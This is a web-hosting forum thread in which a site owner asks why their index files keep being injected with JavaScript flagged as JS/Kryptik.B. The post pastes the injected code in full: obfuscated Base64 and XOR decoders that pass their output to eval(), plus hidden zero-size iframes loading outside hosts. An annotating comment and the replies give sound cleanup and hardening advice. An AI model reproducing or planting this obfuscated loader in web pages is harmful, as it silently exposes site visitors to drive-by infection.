
Why my index files on the server be infected with JS/Kryptik.B (Troyano)

Discussion in 'General Discussion' started by PC-Drivers, Nov 29, 2008.

  1. PC-Drivers

    PC-Drivers Member

    Joined:
    Aug 1, 2004
    Messages:
    7
    Likes Received:
    0
    Trophy Points:
    151
    When I upload an index file (index.htm / index.html / index.php) #index.ext#,
    within about three days the copy on the server has automatically had JavaScript code containing a trojan added to it.

    Example:

    Code:
    <!--
      Analysis note: this sample is five injected <script> blocks plus one hidden <iframe>.
      1. wJjZIf object: `ou` is the standard Base64 alphabet. i11Ojos() Base64-decodes its argument,
         UXu6uINfsK() UTF-8-decodes the result, and WAa() hands the string to eval(). The Base64
         literal passed in decodes to a document.write() of an <iframe width=0 height=0> whose src is
         hxxp://a9rhiwa[.]cn/update_files/update.php (defanged here).
      2. vyndztmmJ / BESgJKf (the same block appears twice): "\x66\x72\x6F..." is the hex-escaped
         name fromCharCode. BESgJKf() maps each input character through the omP9gI table
         (index = char code minus 48) to a 6-bit value, reassembles bytes, XORs each with 55 and
         returns the string, which is passed to eval(). The decoded payload is not reproduced here.
      3. <iframe ... style="display:none">: a plain, unobfuscated hidden frame to a third-party host.
      4. ly17Cd8 / K3EEJ (also present twice): same scheme as item 2 with a different table (EVgfz)
         and XOR constant 202; "from"+"Char"+"Code" and the eval("...Ma"+"th.m"+"in(...)") string
         splitting hide the API names from simple keyword matching.
      NOTE(review): the duplicated blocks suggest the file was modified on more than one occasion;
      the sample alone does not prove this. For cleanup and detection, search all index.* files for
      eval( used together with fromCharCode, for document.write of an iframe, and for iframes with
      zero size or display:none.
    -->
    <script language="JavaScript">var wJjZIf={ou:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",i11Ojos:function(WlsrpEG){var gruMqF0vy="",qsHiSfFA5UD0C0,Ook8UnFsAzpv8,uQqDFZKnr,kXMqka9Zkc,pICrUeduf35SE,SZrTnjYXQuk7U,A6skYhraPC4rx,jtskEvcG=0;WlsrpEG=WlsrpEG.replace(/[^A-Za-z0-9\+\/\=]/g,"");while(jtskEvcG<WlsrpEG.length){kXMqka9Zkc=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));pICrUeduf35SE=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));SZrTnjYXQuk7U=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));A6skYhraPC4rx=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));qsHiSfFA5UD0C0=(kXMqka9Zkc<<2)|(pICrUeduf35SE>>4);Ook8UnFsAzpv8=((pICrUeduf35SE&15)<<4)|(SZrTnjYXQuk7U>>2);uQqDFZKnr=((SZrTnjYXQuk7U&3)<<6)|A6skYhraPC4rx;gruMqF0vy+=this.NTdhIMHe1Sd(qsHiSfFA5UD0C0);if(SZrTnjYXQuk7U!=64){gruMqF0vy+=this.NTdhIMHe1Sd(Ook8UnFsAzpv8);}if(A6skYhraPC4rx!=64){gruMqF0vy+=this.NTdhIMHe1Sd(uQqDFZKnr);}}return(wJjZIf.UXu6uINfsK(gruMqF0vy));},UXu6uINfsK:function(X8){var slflkY2R="",kllYRVG2Z2U=bfCRqsX=cfMYGqAqE2=yf0nHdCYyIROAktg=0;while(kllYRVG2Z2U<X8.length){bfCRqsX=X8.charCodeAt(kllYRVG2Z2U);if(bfCRqsX<128){slflkY2R+=this.NTdhIMHe1Sd(bfCRqsX);kllYRVG2Z2U++;}else if((bfCRqsX>191)&&(bfCRqsX<224)){yf0nHdCYyIROAktg=X8.charCodeAt(kllYRVG2Z2U+1);slflkY2R+=this.NTdhIMHe1Sd(((bfCRqsX&31)<<6)|(yf0nHdCYyIROAktg&63));kllYRVG2Z2U+=2;}else{yf0nHdCYyIROAktg=X8.charCodeAt(kllYRVG2Z2U+1);cfMYGqAqE2=X8.charCodeAt(kllYRVG2Z2U+2);slflkY2R+=this.NTdhIMHe1Sd(((bfCRqsX&15)<<12)|((yf0nHdCYyIROAktg&63)<<6)|(cfMYGqAqE2&63));kllYRVG2Z2U+=3;}}return(slflkY2R);},WAa:function(IwLaGn7P0Ft){eval(IwLaGn7P0Ft);},NTdhIMHe1Sd:function(zMNTzJcZik3Mcv){return(String.fromCharCode(zMNTzJcZik3Mcv));}}
    wJjZIf.WAa(wJjZIf.i11Ojos('ZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgd2lkdGg9MCBoZWlnaHQ9MCBzcmM9Imh0dHA6Ly9hOXJoaXdhLmNuL3VwZGF0ZV9maWxlcy91cGRhdGUucGhwIj48L2lmcmFtZT4nKQ=='))</script><script>function vyndztmmJ(jbgUBWzfP){return String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](jbgUBWzfP);}function BESgJKf(haMTJkKrmh){var E7S99BkTF8K=0,GojhCcX=haMTJkKrmh.length,Ybfgst9ZD=1024,TF5pbY0,Z10aeROO0b2gj,bPAAJJj="",uzmroOPykIzt=E7S99BkTF8K,BLH3Ut5AcYS=E7S99BkTF8K,FcK4MrqLdhA2=E7S99BkTF8K,omP9gI=Array(63,61,41,4,23,21,18,1,40,29,0,0,0,0,0,0,50,54,51,17,49,36,43,59,6,37,9,10,11,22,13,47,62,19,14,8,35,44,28,48,57,3,32,0,0,0,0,20,0,5,56,31,30,34,16,52,15,58,33,60,45,53,38,27,25,26,24,2,42,46,7,12,55,39,0);for(Z10aeROO0b2gj=Math.ceil(GojhCcX/Ybfgst9ZD);Z10aeROO0b2gj>E7S99BkTF8K;Z10aeROO0b2gj--){for(TF5pbY0=Math.min(GojhCcX,Ybfgst9ZD);TF5pbY0>E7S99BkTF8K;TF5pbY0--,GojhCcX--){FcK4MrqLdhA2|=(omP9gI[haMTJkKrmh.charCodeAt(uzmroOPykIzt++)-48])<<BLH3Ut5AcYS;if(BLH3Ut5AcYS){bPAAJJj+=vyndztmmJ(55^FcK4MrqLdhA2&255);FcK4MrqLdhA2>>=8;BLH3Ut5AcYS-=2;}else{BLH3Ut5AcYS=6;}}}return (bPAAJJj);}var uapVT="igThQja5s2I_pN_Hz5E4YJmvfUZ4C5E5qJmazXm_Y1IsvVD46Xa_cNEsvV7CaCIscNgfvmzHr_gzq9E5pf5Mr3aMaJEMrb5MQJmQpVg4v9j4Q2zCQ7aCQaa_JraCdjm_95Wsrb5_apIM6Iz3dWZR1bY";eval(BESgJKf(uapVT));</script><script>function vyndztmmJ(jbgUBWzfP){return String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](jbgUBWzfP);}function BESgJKf(haMTJkKrmh){var 
E7S99BkTF8K=0,GojhCcX=haMTJkKrmh.length,Ybfgst9ZD=1024,TF5pbY0,Z10aeROO0b2gj,bPAAJJj="",uzmroOPykIzt=E7S99BkTF8K,BLH3Ut5AcYS=E7S99BkTF8K,FcK4MrqLdhA2=E7S99BkTF8K,omP9gI=Array(63,61,41,4,23,21,18,1,40,29,0,0,0,0,0,0,50,54,51,17,49,36,43,59,6,37,9,10,11,22,13,47,62,19,14,8,35,44,28,48,57,3,32,0,0,0,0,20,0,5,56,31,30,34,16,52,15,58,33,60,45,53,38,27,25,26,24,2,42,46,7,12,55,39,0);for(Z10aeROO0b2gj=Math.ceil(GojhCcX/Ybfgst9ZD);Z10aeROO0b2gj>E7S99BkTF8K;Z10aeROO0b2gj--){for(TF5pbY0=Math.min(GojhCcX,Ybfgst9ZD);TF5pbY0>E7S99BkTF8K;TF5pbY0--,GojhCcX--){FcK4MrqLdhA2|=(omP9gI[haMTJkKrmh.charCodeAt(uzmroOPykIzt++)-48])<<BLH3Ut5AcYS;if(BLH3Ut5AcYS){bPAAJJj+=vyndztmmJ(55^FcK4MrqLdhA2&255);FcK4MrqLdhA2>>=8;BLH3Ut5AcYS-=2;}else{BLH3Ut5AcYS=6;}}}return (bPAAJJj);}var uapVT="igThQja5s2I_pN_Hz5E4YJmvfUZ4C5E5qJmazXm_Y1IsvVD46Xa_cNEsvV7CaCIscNgfvmzHr_gzq9E5pf5Mr3aMaJEMrb5MQJmQpVg4v9j4Q2zCQ7aCQaa_JraCdjm_95Wsrb5_apIM6Iz3dWZR1bY";eval(BESgJKf(uapVT));</script><iframe src="http://avwav.com/3341.htm" style="display:none"></iframe><script>function ly17Cd8(LmhPynqL){return String["from"+"Char"+"Code"](LmhPynqL);}function K3EEJ(cQfqZhQL){var YP2gJ8QfVEO=0,UmN6bSRQYkZm=cQfqZhQL.length,I8Bl0Q1TcJtI=1024,KzapXMbvS,xtcwdCi3,dEjzekSH4MZDq="",Qf7BG3dTPW7LA=YP2gJ8QfVEO,ADGuR=YP2gJ8QfVEO,h7kMNnix2ZWqE=YP2gJ8QfVEO,EVgfz=Array(63,21,28,38,30,49,53,58,19,29,0,0,0,0,0,0,26,62,47,42,43,48,40,54,44,11,1,18,3,6,41,8,59,55,9,0,31,56,33,60,39,52,17,0,0,0,0,16,0,61,34,7,24,5,25,2,22,45,27,20,12,14,57,32,4,51,13,37,50,23,15,10,36,35,46);for(xtcwdCi3=Math.ceil(UmN6bSRQYkZm/I8Bl0Q1TcJtI);xtcwdCi3>YP2gJ8QfVEO;xtcwdCi3--){for(eval("KzapXMbvS=Ma"+"th.m"+"in(UmN6bSRQYkZm,I8Bl0Q1TcJtI)");KzapXMbvS>YP2gJ8QfVEO;KzapXMbvS--,UmN6bSRQYkZm--){h7kMNnix2ZWqE|=(EVgfz[cQfqZhQL.charCodeAt(Qf7BG3dTPW7LA++)-48])<<ADGuR;if(ADGuR){dEjzekSH4MZDq+=ly17Cd8(202^h7kMNnix2ZWqE&255);h7kMNnix2ZWqE>>=8;ADGuR-=2;}else{ADGuR=6;}}}return (dEjzekSH4MZDq);}var 
e6RMPV="cLWEzh@C047Dx7InabPFAACUij0FHbPCXAC7amCDAw7a7DzFBm@Db7Pa7D4zU37ab7DB7gTnsyD0XCPCxXwNsq@NUAPNsvwNzACHxDDF7CAFz4TzzG@zzt@DYB@zyhCDobBasvwDUz7NBKTPyc05Svl";eval(K3EEJ(e6RMPV));</script><script>function ly17Cd8(LmhPynqL){return String["from"+"Char"+"Code"](LmhPynqL);}function K3EEJ(cQfqZhQL){var YP2gJ8QfVEO=0,UmN6bSRQYkZm=cQfqZhQL.length,I8Bl0Q1TcJtI=1024,KzapXMbvS,xtcwdCi3,dEjzekSH4MZDq="",Qf7BG3dTPW7LA=YP2gJ8QfVEO,ADGuR=YP2gJ8QfVEO,h7kMNnix2ZWqE=YP2gJ8QfVEO,EVgfz=Array(63,21,28,38,30,49,53,58,19,29,0,0,0,0,0,0,26,62,47,42,43,48,40,54,44,11,1,18,3,6,41,8,59,55,9,0,31,56,33,60,39,52,17,0,0,0,0,16,0,61,34,7,24,5,25,2,22,45,27,20,12,14,57,32,4,51,13,37,50,23,15,10,36,35,46);for(xtcwdCi3=Math.ceil(UmN6bSRQYkZm/I8Bl0Q1TcJtI);xtcwdCi3>YP2gJ8QfVEO;xtcwdCi3--){for(eval("KzapXMbvS=Ma"+"th.m"+"in(UmN6bSRQYkZm,I8Bl0Q1TcJtI)");KzapXMbvS>YP2gJ8QfVEO;KzapXMbvS--,UmN6bSRQYkZm--){h7kMNnix2ZWqE|=(EVgfz[cQfqZhQL.charCodeAt(Qf7BG3dTPW7LA++)-48])<<ADGuR;if(ADGuR){dEjzekSH4MZDq+=ly17Cd8(202^h7kMNnix2ZWqE&255);h7kMNnix2ZWqE>>=8;ADGuR-=2;}else{ADGuR=6;}}}return (dEjzekSH4MZDq);}var e6RMPV="cLWEzh@C047Dx7InabPFAACUij0FHbPCXAC7amCDAw7a7DzFBm@Db7Pa7D4zU37ab7DB7gTnsyD0XCPCxXwNsq@NUAPNsvwNzACHxDDF7CAFz4TzzG@zzt@DYB@zyhCDobBasvwDUz7NBKTPyc05Svl";eval(K3EEJ(e6RMPV));</script>
    
     
  2. sirotex

    sirotex Well-Known Member

    Joined:
    Jul 10, 2008
    Messages:
    121
    Likes Received:
    0
    Trophy Points:
    66
    Um... then someone is updating your files; it is not 'automated'. Just remove the injected code and change all your passwords.
     
  3. apscinsspl

    apscinsspl Well-Known Member

    Joined:
    Mar 15, 2008
    Messages:
    112
    Likes Received:
    0
    Trophy Points:
    66
    It looks like your system is infected and your root password has leaked. Change the server's password as a priority, then remove all index files and re-upload them, and change all cPanel passwords, since FTP may also have been cracked.
     
  4. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    4
    Trophy Points:
    193
    Location:
    Minneapolis, MN
    If you don't secure and harden your server, hackers will continue infecting your files with JS codes. Search the cPanel forum for information on how to secure and harden your server.
     
  5. thewebhosting

    thewebhosting Well-Known Member

    Joined:
    May 9, 2008
    Messages:
    1,201
    Likes Received:
    1
    Trophy Points:
    68
    Please regularly update the password of your CPanel and FTP accounts. Make sure you choose a strong password which contains special characters.

    Also, make a habit of checking for the latest available version of any third-party software installed on your domain.
     